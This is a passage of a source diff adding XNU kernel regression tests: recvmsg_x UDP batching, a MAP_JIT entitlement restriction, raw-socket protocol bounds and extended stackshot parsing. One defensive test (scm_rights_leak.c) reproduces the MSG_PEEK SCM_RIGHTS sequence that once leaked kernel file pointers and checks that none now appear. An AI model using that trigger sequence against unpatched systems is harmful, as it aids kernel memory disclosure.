T_EXPECT_POSIX_SUCCESS(fcntl(recvSocket, F_SETFL, flags | O_NONBLOCK), "fcntl()"); + + int sendSocket; + T_QUIET; T_EXPECT_POSIX_SUCCESS(sendSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), "sendSocket socket()"); + + for (int dontTrunc = 0; dontTrunc <= 1; dontTrunc++) { + T_QUIET; T_EXPECT_POSIX_SUCCESS(setsockopt(recvSocket, SOL_SOCKET, SO_DONTTRUNC, (void *)&dontTrunc, sizeof(dontTrunc)), "setsockopt(SO_DONTTRUNC)"); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN, 50); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN * 2, 50); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN / 2, 50); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN, 10); + + T_LOG("\n================= recvmsg_x() test =================\n"); + sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN); + recvPackets_x(recvSocket, NMSGS, BUFFERLEN / 2, 10); + } + + close(sendSocket); + close(recvSocket); + + T_LOG("\n================= PASS =================\n"); +} diff --git a/tests/restrict_jit.c b/tests/restrict_jit.c new file mode 100644 index 000000000..d7f824ec1 --- /dev/null +++ b/tests/restrict_jit.c @@ -0,0 +1,33 @@ +#include +#include +#include +#include + +#include + + +/* + * macOS only test. Try to map 2 different MAP_JIT regions. 2nd should fail. + */ +T_DECL(restrict_jit, "macOS restricted JIT entitlement test") +{ +#if TARGET_OS_OSX + void *addr1; + void *addr2; + size_t size = 64 * 1024; + + + addr1 = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); + T_ASSERT_NE_PTR(addr1, MAP_FAILED, "First map MAP_JIT"); + + addr2 = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); + if (addr2 == MAP_FAILED) { + T_PASS("Only one MAP_JIT was allowed"); + } else { + T_FAIL("Second MAP_JIT was allowed"); + } + +#else + T_SKIP("Not macOS"); +#endif +} diff --git a/tests/restrict_jit.entitlements b/tests/restrict_jit.entitlements new file mode 100644 index 000000000..f9b25e27c --- /dev/null +++ b/tests/restrict_jit.entitlements @@ -0,0 +1,12 @@ + + + + + dynamic-codesigning + + com.apple.security.cs.allow-jit + + com.apple.security.cs.single-jit + + + diff --git a/tests/scm_rights_leak.c b/tests/scm_rights_leak.c new file mode 100644 index 000000000..ac549b0ae --- /dev/null +++ b/tests/scm_rights_leak.c @@ -0,0 +1,108 @@ +/* + * Copyright (c) 2021 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include + +#include +#include + +#include + +#define MAX_SOCK 10 + +T_DECL(scm_rights_leak, "test leak of file pointers by peeking SCM_RIGHTS") +{ + int pair[2]; + + T_ASSERT_POSIX_SUCCESS(socketpair(AF_UNIX, SOCK_STREAM, 0, pair), + NULL); + + struct cmsghdr *cmsg; + T_ASSERT_NOTNULL(cmsg = calloc(1, MAX_SOCK * sizeof(int)), "calloc"); + cmsg->cmsg_len = CMSG_LEN(MAX_SOCK * sizeof(int)); + cmsg->cmsg_level = SOL_SOCKET; + cmsg->cmsg_type = SCM_RIGHTS; + + int *sock_fds = (int *)(void *)CMSG_DATA(cmsg); + for (int i = 0; i < MAX_SOCK; i++) { + T_ASSERT_POSIX_SUCCESS(sock_fds[i] = socket(AF_UNIX, SOCK_DGRAM, 0), NULL); + } + for (int i = 0; i < MAX_SOCK; i++) { + fprintf(stderr, "sock_fds[%d] %i\n", i, sock_fds[i]); + } + + struct iovec iovec[1]; + char data = 'x'; + iovec[0].iov_base = &data; + iovec[0].iov_len = 1; + + struct msghdr mh; + mh.msg_name = 0; + mh.msg_namelen = 0; + mh.msg_iov = iovec; + mh.msg_iovlen = 1; + mh.msg_control = cmsg; + mh.msg_controllen = cmsg->cmsg_len; + mh.msg_flags = 0; + + ssize_t ssize; + ssize = sendmsg(pair[0], &mh, 0); + T_ASSERT_EQ(ssize, (ssize_t)1, "sendmsg"); + + struct cmsghdr *rcmsg; + T_EXPECT_POSIX_SUCCESS_(rcmsg = calloc(2048, 1), "calloc"); + + mh.msg_name = 0; + mh.msg_namelen = 0; + mh.msg_iov = iovec; + mh.msg_iovlen = 1; + mh.msg_control = rcmsg; + mh.msg_controllen = 2048; + mh.msg_flags = 0; + + ssize = recvmsg(pair[1], &mh, MSG_PEEK); + T_ASSERT_POSIX_SUCCESS(ssize, "recvmsg"); + uintptr_t *r_ptrs = (uintptr_t *)(void *)CMSG_DATA(rcmsg); + socklen_t nptrs = (rcmsg->cmsg_len - CMSG_LEN(0)) / sizeof(uintptr_t); + for (socklen_t i = 0; i < nptrs; i++) { + T_EXPECT_EQ(r_ptrs[i], (uintptr_t)0, "r_ptrs[%u] 0x%lx\n", i, r_ptrs[i]); + } + + ssize = recvmsg(pair[1], &mh, 0); + T_ASSERT_POSIX_SUCCESS(ssize, "recvmsg"); + int *r_fds = (int *)(void *)CMSG_DATA(rcmsg); + for (int i = 0; i < MAX_SOCK; i++) { + T_EXPECT_NE(r_fds[i], 0, "r_fds[%d] %i\n", i, r_fds[i]); + } + + free(cmsg); + free(rcmsg); + close(pair[0]); + close(pair[1]); +} diff --git a/tests/socket_raw_uint8_max.c b/tests/socket_raw_uint8_max.c new file mode 100644 index 000000000..44d01c166 --- /dev/null +++ b/tests/socket_raw_uint8_max.c @@ -0,0 +1,13 @@ +#include +#include + +T_DECL(socket_raw_uint8_max, "create socket with borderline proto numbers") +{ + int fd = socket(AF_INET, SOCK_RAW, 256); + + T_ASSERT_POSIX_FAILURE(fd, EINVAL, "socket(AF_INET, SOCK_RAW, 256);"); + + int fd2 = socket(AF_INET, SOCK_RAW, 255); + + T_ASSERT_POSIX_SUCCESS(fd2, "socket(AF_INET, SOCK_RAW, 255);"); +} diff --git a/tests/stackshot_tests.m b/tests/stackshot_tests.m index ce904d2d8..ae6aef50f 100644 --- a/tests/stackshot_tests.m +++ b/tests/stackshot_tests.m @@ -14,6 +14,7 @@ #include #include #include +#include #import T_GLOBAL_META( @@ -46,13 +47,17 @@ static uint64_t global_flags = 0; #define PARSE_STACKSHOT_WAITINFO_CSEG 0x40 #define PARSE_STACKSHOT_WAITINFO_SRP 0x80 #define PARSE_STACKSHOT_TRANSLATED 0x100 +#define PARSE_STACKSHOT_SHAREDCACHE_FLAGS 0x200 /* keys for 'extra' dictionary for parse_stackshot */ static const NSString* zombie_child_pid_key = @"zombie_child_pid"; // -> @(pid), required for PARSE_STACKSHOT_ZOMBIE static const NSString* postexec_child_unique_pid_key = @"postexec_child_unique_pid"; // -> @(unique_pid), required for PARSE_STACKSHOT_POSTEXEC static const NSString* cseg_expected_threadid_key = @"cseg_expected_threadid"; // -> @(tid), required for PARSE_STACKSHOT_WAITINFO_CSEG -static const NSString* srp_expected_pid_key = @"srp_expected_pid"; // -> @(pid), required for PARSE_STACKSHOT_WAITINFO_SRP +static const NSString* srp_expected_threadid_key = @"srp_expected_threadid"; // -> @(tid), this or ..._pid required for PARSE_STACKSHOT_WAITINFO_SRP +static const NSString* srp_expected_pid_key = @"srp_expected_pid"; // -> @(pid), this or ..._threadid required for PARSE_STACKSHOT_WAITINFO_SRP static const NSString* translated_child_pid_key = @"translated_child_pid"; // -> @(pid), required for PARSE_STACKSHOT_TRANSLATED +static const NSString* sharedcache_child_pid_key = @"sharedcache_child_pid"; // @(pid), required for PARSE_STACKSHOT_SHAREDCACHE_FLAGS +static const NSString* sharedcache_child_sameaddr_key = @"sharedcache_child_sameaddr"; // @(0 or 1), required for PARSE_STACKSHOT_SHAREDCACHE_FLAGS #define TEST_STACKSHOT_QUEUE_LABEL "houston.we.had.a.problem" #define TEST_STACKSHOT_QUEUE_LABEL_LENGTH sizeof(TEST_STACKSHOT_QUEUE_LABEL) @@ -371,19 +376,18 @@ T_DECL(stress, "test that taking stackshots for 60 seconds doesn't crash the sys STACKSHOT_SAVE_LOADINFO | STACKSHOT_SAVE_KEXT_LOADINFO | STACKSHOT_GET_GLOBAL_MEM_STATS | - // STACKSHOT_GET_BOOT_PROFILE | STACKSHOT_SAVE_IMP_DONATION_PIDS | STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT | STACKSHOT_THREAD_GROUP | STACKSHOT_SAVE_JETSAM_COALITIONS | STACKSHOT_ASID | - // STACKSHOT_PAGE_TABLES | 0), }; start_time = clock_gettime_nsec_np(CLOCK_MONOTONIC); while (clock_gettime_nsec_np(CLOCK_MONOTONIC) - start_time < max_diff_time) { - take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + take_stackshot(&scenario, false, ^(void * __unused ssbuf, + size_t __unused sslen) { printf("."); fflush(stdout); }); @@ -435,6 +439,100 @@ T_DECL(dispatch_queue_label, "test that kcdata stackshots contain libdispatch qu dispatch_semaphore_signal(parent_done_sem); } +#define CACHEADDR_ENV "STACKSHOT_TEST_DYLDADDR" +T_HELPER_DECL(spawn_reslide_child, "child process to spawn with alternate slide") +{ + size_t shared_cache_len; + const void *addr, *prevaddr; + uintmax_t v; + char *endptr; + + const char *cacheaddr_env = getenv(CACHEADDR_ENV); + T_QUIET; T_ASSERT_NOTNULL(cacheaddr_env, "getenv("CACHEADDR_ENV")"); + errno = 0; + endptr = NULL; + v = strtoumax(cacheaddr_env, &endptr, 16); /* read hex value */ + T_WITH_ERRNO; T_QUIET; T_ASSERT_NE(v, 0l, "getenv(%s) = \"%s\" should be a non-zero hex number", CACHEADDR_ENV, cacheaddr_env); + T_QUIET; T_ASSERT_EQ(*endptr, 0, "getenv(%s) = \"%s\" endptr \"%s\" should be empty", CACHEADDR_ENV, cacheaddr_env, endptr); + + prevaddr = (const void *)v; + addr = _dyld_get_shared_cache_range(&shared_cache_len); + T_QUIET; T_ASSERT_NOTNULL(addr, "shared cache address"); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(getppid(), (addr == prevaddr) ? SIGUSR2 : SIGUSR1), "signaled parent to take stackshot"); + for (;;) { + (void) pause(); /* parent will kill -9 us */ + } +} + +T_DECL(shared_cache_flags, "tests stackshot's task_ss_flags for the shared cache") +{ + posix_spawnattr_t attr; + char *env_addr; + char path[PATH_MAX]; + __block bool child_same_addr = false; + + uint32_t path_size = sizeof(path); + T_QUIET; T_ASSERT_POSIX_ZERO(_NSGetExecutablePath(path, &path_size), "_NSGetExecutablePath"); + char *args[] = { path, "-n", "spawn_reslide_child", NULL }; + pid_t pid; + size_t shared_cache_len; + const void *addr; + + dispatch_source_t child_diffsig_src, child_samesig_src; + dispatch_semaphore_t child_ready_sem = dispatch_semaphore_create(0); + T_QUIET; T_ASSERT_NOTNULL(child_ready_sem, "shared_cache child semaphore"); + + dispatch_queue_t signal_processing_q = dispatch_queue_create("signal processing queue", NULL); + T_QUIET; T_ASSERT_NOTNULL(signal_processing_q, "signal processing queue"); + + signal(SIGUSR1, SIG_IGN); + signal(SIGUSR2, SIG_IGN); + child_samesig_src = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, signal_processing_q); + T_QUIET; T_ASSERT_NOTNULL(child_samesig_src, "dispatch_source_create (child_samesig_src)"); + child_diffsig_src = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR2, 0, signal_processing_q); + T_QUIET; T_ASSERT_NOTNULL(child_diffsig_src, "dispatch_source_create (child_diffsig_src)"); + + /* child will signal us depending on if their addr is the same or different */ + dispatch_source_set_event_handler(child_samesig_src, ^{ child_same_addr = false; dispatch_semaphore_signal(child_ready_sem); }); + dispatch_source_set_event_handler(child_diffsig_src, ^{ child_same_addr = true; dispatch_semaphore_signal(child_ready_sem); }); + dispatch_activate(child_samesig_src); + dispatch_activate(child_diffsig_src); + + addr = _dyld_get_shared_cache_range(&shared_cache_len); + T_QUIET; T_ASSERT_NOTNULL(addr, "shared cache address"); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(asprintf(&env_addr, "%p", addr), "asprintf of env_addr succeeded"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(setenv(CACHEADDR_ENV, env_addr, true), "setting "CACHEADDR_ENV" to %s", env_addr); + + T_QUIET; T_ASSERT_POSIX_ZERO(posix_spawnattr_init(&attr), "posix_spawnattr_init"); + T_QUIET; T_ASSERT_POSIX_ZERO(posix_spawnattr_setflags(&attr, _POSIX_SPAWN_RESLIDE), "posix_spawnattr_setflags"); + int sp_ret = posix_spawn(&pid, path, NULL, &attr, args, environ); + T_ASSERT_POSIX_ZERO(sp_ret, "spawned process '%s' with PID %d", args[0], pid); + + dispatch_semaphore_wait(child_ready_sem, DISPATCH_TIME_FOREVER); + T_LOG("received signal from child (%s), capturing stackshot", child_same_addr ? "same shared cache addr" : "different shared cache addr"); + + struct scenario scenario = { + .name = "shared_cache_flags", + .flags = (STACKSHOT_SAVE_LOADINFO | STACKSHOT_GET_GLOBAL_MEM_STATS + | STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT + | STACKSHOT_SAVE_IMP_DONATION_PIDS | STACKSHOT_KCDATA_FORMAT), + }; + + take_stackshot(&scenario, false, ^( void *ssbuf, size_t sslen) { + int status; + /* First kill the child so we can reap it */ + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGKILL), "killing spawned process"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on spawned child"); + T_QUIET; T_ASSERT_EQ(!!WIFSIGNALED(status), 1, "waitpid status should be signalled"); + T_QUIET; T_ASSERT_EQ(WTERMSIG(status), SIGKILL, "waitpid status should be SIGKILLed"); + + parse_stackshot(PARSE_STACKSHOT_SHAREDCACHE_FLAGS, ssbuf, sslen, + @{sharedcache_child_pid_key: @(pid), sharedcache_child_sameaddr_key: @(child_same_addr ? 1 : 0)}); + }); +} + static void *stuck_sysctl_thread(void *arg) { int val = 1; dispatch_semaphore_t child_thread_started = *(dispatch_semaphore_t *)arg; @@ -1013,7 +1111,7 @@ static void stackshot_verify_current_proc_uuid_info(void **ssbuf, size_t sslen, T_DECL(translated, "tests translated bit is set correctly") { #if !(TARGET_OS_OSX && TARGET_CPU_ARM64) - T_SKIP("Not arm mac") + T_SKIP("Only valid on Apple silicon Macs") #endif // Get path of stackshot_translated_child helper binary char path[PATH_MAX]; @@ -1052,7 +1150,7 @@ T_DECL(translated, "tests translated bit is set correctly") struct kinfo_proc process_info; size_t bufsize = sizeof(process_info); T_QUIET; T_ASSERT_POSIX_SUCCESS(sysctl(mib, (unsigned)(sizeof(mib)/sizeof(int)), &process_info, &bufsize, NULL, 0), "get translated child process info"); - T_QUIET; T_ASSERT_GT(bufsize, 0, "process info is not empty"); + T_QUIET; T_ASSERT_GT(bufsize, (size_t)0, "process info is not empty"); T_QUIET; T_ASSERT_TRUE((process_info.kp_proc.p_flag & P_TRANSLATED), "KERN_PROC_PID reports child is translated"); T_LOG("capturing stackshot"); @@ -1064,13 +1162,14 @@ T_DECL(translated, "tests translated bit is set correctly") }; take_stackshot(&scenario, true, ^( void *ssbuf, size_t sslen) { - // Kill the child - int status; - T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGTERM), "kill translated child"); - T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on translated child"); - parse_stackshot(PARSE_STACKSHOT_TRANSLATED, ssbuf, sslen, @{translated_child_pid_key: @(pid)}); }); + + // Kill the child + int status; + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGTERM), "kill translated child"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on translated child"); + } T_DECL(proc_uuid_info, "tests that the main binary UUID for a proc is always populated") @@ -1127,7 +1226,6 @@ T_DECL(proc_uuid_info, "tests that the main binary UUID for a proc is always pop T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct waitinfo") { - int val = 1; struct scenario scenario = { .name = "cseg_waitinfo", .quiet = false, @@ -1141,6 +1239,7 @@ T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct dispatch_async(dq, ^{ pthread_threadid_np(NULL, &thread_id); dispatch_semaphore_signal(child_ok); + int val = 1; T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.cseg_wedge_thread", NULL, NULL, &val, sizeof(val)), "wedge child thread"); }); @@ -1149,6 +1248,7 @@ T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct T_LOG("taking stackshot"); take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + int val = 1; T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.cseg_unwedge_thread", NULL, NULL, &val, sizeof(val)), "unwedge child thread"); parse_stackshot(PARSE_STACKSHOT_WAITINFO_CSEG, ssbuf, sslen, @{cseg_expected_threadid_key: @(thread_id)}); }); @@ -1274,6 +1374,42 @@ T_HELPER_DECL(srp_client, T_LOG("client process exiting after sending message to parent (server)"); } +enum srp_test_type { + SRP_TEST_THREAD, /* expect waiter on current thread */ + SRP_TEST_PID, /* expect waiter on current PID */ + SRP_TEST_EITHER, /* waiter could be on either */ +}; + +static void +check_srp_test(const char *name, enum srp_test_type ty) +{ + struct scenario scenario = { + .name = name, + .quiet = false, + .flags = (STACKSHOT_THREAD_WAITINFO | STACKSHOT_KCDATA_FORMAT), + }; + uint64_t thread_id = 0; + pthread_threadid_np(NULL, &thread_id); + if (ty == SRP_TEST_THREAD) { + take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, + @{srp_expected_threadid_key: @(thread_id)}); + }); + } else if (ty == SRP_TEST_PID) { + take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, + @{srp_expected_pid_key: @(getpid())}); + }); + } else { + take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { + parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, + @{srp_expected_pid_key: @(getpid()), srp_expected_threadid_key: @(thread_id)}); + }); + } + +} + + /* * Tests the stackshot wait info plumbing for synchronous IPC that doesn't use kevent on the server. * @@ -1285,11 +1421,14 @@ T_HELPER_DECL(srp_client, * to a server that receives the message and copies in the send-once right, but doesn't * reply to the client. for this case the special reply port is copied out and the kernel * stashes the info about which task copied out the send once right. (rdar://60440592) + * (part 3): tests the same as part 2, but uses kevents, which allow for + * priority inheritance */ T_DECL(special_reply_port, "test that tasks using special reply ports have correct waitinfo") { dispatch_semaphore_t can_continue = dispatch_semaphore_create(0); dispatch_queue_t dq = dispatch_queue_create("signalqueue", NULL); + dispatch_queue_t machdq = dispatch_queue_create("machqueue", NULL); dispatch_source_t sig_src; char path[PATH_MAX]; uint32_t path_size = sizeof(path); @@ -1298,11 +1437,6 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre pid_t client_pid; int sp_ret; kern_return_t kr; - struct scenario scenario = { - .name = "srp", - .quiet = false, - .flags = (STACKSHOT_THREAD_WAITINFO | STACKSHOT_KCDATA_FORMAT), - }; mach_port_t port; /* setup the signal handler in the parent (server) */ @@ -1328,18 +1462,20 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER); T_LOG("Ready to take stackshot, but waiting 1s for the coast to clear"); + /* + * can_continue indicates the client has signaled us, but we want to make + * sure they've actually blocked sending their mach message. It's cheesy, but + * sleep() works for this. + */ sleep(1); /* * take the stackshot without calling receive to verify that the stackshot wait - * info shows our (the server) PID for the scenario where the server has yet to + * info shows our (the server) thread for the scenario where the server has yet to * receive the message. */ T_LOG("Taking stackshot for part 1 coverage"); - take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { - parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, - @{srp_expected_pid_key: @(getpid())}); - }); + check_srp_test("srp", SRP_TEST_THREAD); /* * receive the message from the client (which should copy the send once right into @@ -1375,17 +1511,55 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre * for the scenario where the server has received the message and copied in the send-once right. */ T_LOG("Taking stackshot for part 2 coverage"); - take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { - parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen, - @{srp_expected_pid_key: @(getpid())}); - }); + check_srp_test("srp", SRP_TEST_PID); /* cleanup - kill the client */ - T_LOG("killing client"); - kill(client_pid, SIGKILL); + T_ASSERT_POSIX_SUCCESS(kill(client_pid, SIGKILL), "killing client"); + T_ASSERT_POSIX_SUCCESS(waitpid(client_pid, NULL, 0), "waiting for the client to exit"); + + // do it again, but using kevents + T_LOG("Launching client"); + sp_ret = posix_spawn(&client_pid, client_args[0], NULL, NULL, client_args, NULL); + T_QUIET; T_ASSERT_POSIX_ZERO(sp_ret, "spawned process '%s' with PID %d", client_args[0], client_pid); + T_LOG("Spawned client as PID %d", client_pid); - T_LOG("waiting for the client to exit"); - waitpid(client_pid, NULL, 0); + dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER); + T_LOG("Ready to take stackshot, but waiting 1s for the coast to clear"); + + /* + * can_continue indicates the client has signaled us, but we want to make + * sure they've actually blocked sending their mach message. It's cheesy, but + * sleep() works for this. + */ + sleep(1); + + dispatch_mach_t dispatch_mach = dispatch_mach_create(SRP_SERVICE_NAME, machdq, + ^(dispatch_mach_reason_t reason, + dispatch_mach_msg_t message, + mach_error_t error __unused) { + switch (reason) { + case DISPATCH_MACH_MESSAGE_RECEIVED: { + size_t size = 0; + mach_msg_header_t *msg __unused = dispatch_mach_msg_get_msg(message, &size); + T_LOG("server: recieved %ld byte message", size); + check_srp_test("turnstile_port_thread", SRP_TEST_THREAD); + T_LOG("server: letting client go"); + // drop the message on the ground, we'll kill the client later + dispatch_semaphore_signal(can_continue); + break; + } + default: + break; + } + }); + + dispatch_mach_connect(dispatch_mach, port, MACH_PORT_NULL, NULL); + + dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER); + + /* cleanup - kill the client */ + T_ASSERT_POSIX_SUCCESS(kill(client_pid, SIGKILL), "killing client"); + T_ASSERT_POSIX_SUCCESS(waitpid(client_pid, NULL, 0), "waiting for the client to exit"); } #pragma mark performance tests @@ -1441,7 +1615,7 @@ stackshot_flag_perf_noclobber(uint64_t flag, char *flagname) dt_stat_t duration = dt_stat_create("nanoseconds per thread", "%s_duration", flagname); dt_stat_t size = dt_stat_create("bytes per thread", "%s_size", flagname); - T_LOG("Testing \"%s\" = 0x%x", flagname, flag); + T_LOG("Testing \"%s\" = 0x%" PRIx64, flagname, flag); while (!dt_stat_stable(duration) || !dt_stat_stable(size)) { take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) { @@ -1692,6 +1866,7 @@ static void parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSDictionary *extra) { bool delta = (stackshot_parsing_flags & PARSE_STACKSHOT_DELTA); + bool expect_sharedcache_child = (stackshot_parsing_flags & PARSE_STACKSHOT_SHAREDCACHE_FLAGS); bool expect_zombie_child = (stackshot_parsing_flags & PARSE_STACKSHOT_ZOMBIE); bool expect_postexec_child = (stackshot_parsing_flags & PARSE_STACKSHOT_POSTEXEC); bool expect_cseg_waitinfo = (stackshot_parsing_flags & PARSE_STACKSHOT_WAITINFO_CSEG); @@ -1705,9 +1880,13 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD bool found_translated_child = false; bool found_dispatch_queue_label = false, found_turnstile_lock = false; bool found_cseg_waitinfo = false, found_srp_waitinfo = false; - pid_t zombie_child_pid = -1, srp_expected_pid = 0; + bool found_sharedcache_child = false, found_sharedcache_badflags = false, found_sharedcache_self = false; + uint64_t srp_expected_threadid = 0; + pid_t zombie_child_pid = -1, srp_expected_pid = -1, sharedcache_child_pid = -1; pid_t translated_child_pid = -1; + bool sharedcache_child_sameaddr = false; uint64_t postexec_child_unique_pid = 0, cseg_expected_threadid = 0; + uint64_t sharedcache_child_flags = 0, sharedcache_self_flags = 0; char *inflatedBufferBase = NULL; if (expect_shared_cache_uuid) { @@ -1732,6 +1911,17 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD } } + if (expect_sharedcache_child) { + NSNumber* pid_num = extra[sharedcache_child_pid_key]; + NSNumber* sameaddr_num = extra[sharedcache_child_sameaddr_key]; + T_QUIET; T_ASSERT_NOTNULL(pid_num, "sharedcache child pid provided"); + T_QUIET; T_ASSERT_NOTNULL(sameaddr_num, "sharedcache child addrsame provided"); + sharedcache_child_pid = [pid_num intValue]; + T_QUIET; T_ASSERT_GT(sharedcache_child_pid, 0, "sharedcache child pid greater than zero"); + sharedcache_child_sameaddr = [sameaddr_num intValue]; + T_QUIET; T_ASSERT_GE([sameaddr_num intValue], 0, "sharedcache child sameaddr is boolean (0 or 1)"); + T_QUIET; T_ASSERT_LE([sameaddr_num intValue], 1, "sharedcache child sameaddr is boolean (0 or 1)"); + } if (expect_zombie_child) { NSNumber* pid_num = extra[zombie_child_pid_key]; T_QUIET; T_ASSERT_NOTNULL(pid_num, "zombie child pid provided"); @@ -1749,15 +1939,23 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD if (expect_cseg_waitinfo) { NSNumber* tid_num = extra[cseg_expected_threadid_key]; T_QUIET; T_ASSERT_NOTNULL(tid_num, "cseg's expected thread id provided"); - cseg_expected_threadid = [tid_num intValue]; - T_QUIET; T_ASSERT_GT(cseg_expected_threadid, 0, "cseg_expected_threadid greater than zero"); + cseg_expected_threadid = tid_num.unsignedLongValue; + T_QUIET; T_ASSERT_GT(cseg_expected_threadid, UINT64_C(0), "compressor segment thread is present"); } if (expect_srp_waitinfo) { + NSNumber* threadid_num = extra[srp_expected_threadid_key]; NSNumber* pid_num = extra[srp_expected_pid_key]; - T_QUIET; T_ASSERT_NOTNULL(pid_num, "expected SRP pid provided"); - srp_expected_pid = [pid_num intValue]; - T_QUIET; T_ASSERT_GT(srp_expected_pid , 0, "srp_expected_pid greater than zero"); + T_QUIET; T_ASSERT_TRUE(threadid_num != nil || pid_num != nil, "expected SRP threadid or pid"); + if (threadid_num != nil) { + srp_expected_threadid = [threadid_num unsignedLongLongValue]; + T_QUIET; T_ASSERT_GT(srp_expected_threadid, 0ull, "srp_expected_threadid greater than zero"); + } + if (pid_num != nil) { + srp_expected_pid = [pid_num intValue]; + T_QUIET; T_ASSERT_GT(srp_expected_pid, 0, "srp_expected_pid greater than zero"); + } + T_LOG("looking for SRP pid: %d threadid: %llu", srp_expected_pid, srp_expected_threadid); } if (expect_translated_child) { @@ -1766,7 +1964,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD translated_child_pid = [pid_num intValue]; T_QUIET; T_ASSERT_GT(translated_child_pid, 0, "translated child pid greater than zero"); } - + kcdata_iter_t iter = kcdata_iter(ssbuf, sslen); if (delta) { T_ASSERT_EQ(kcdata_iter_type(iter), KCDATA_BUFFER_BEGIN_DELTA_STACKSHOT, @@ -1787,7 +1985,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD uint64_t *data; char *desc; for (int i = 0; i < 3; i ++) { - kcdata_iter_get_data_with_desc(iter, &desc, &data, NULL); + kcdata_iter_get_data_with_desc(iter, &desc, (void **)&data, NULL); if (strcmp(desc, "kcd_c_type") == 0) { compression_type = *data; } else if (strcmp(desc, "kcd_c_totalout") == 0){ @@ -1799,14 +1997,14 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD iter = kcdata_iter_next(iter); } - T_ASSERT_EQ(compression_type, 1, "zlib compression is used"); - T_ASSERT_GT(totalout, 0, "successfully gathered how long the compressed buffer is"); - T_ASSERT_GT(totalin, 0, "successfully gathered how long the uncompressed buffer will be at least"); + T_ASSERT_EQ(compression_type, UINT64_C(1), "zlib compression 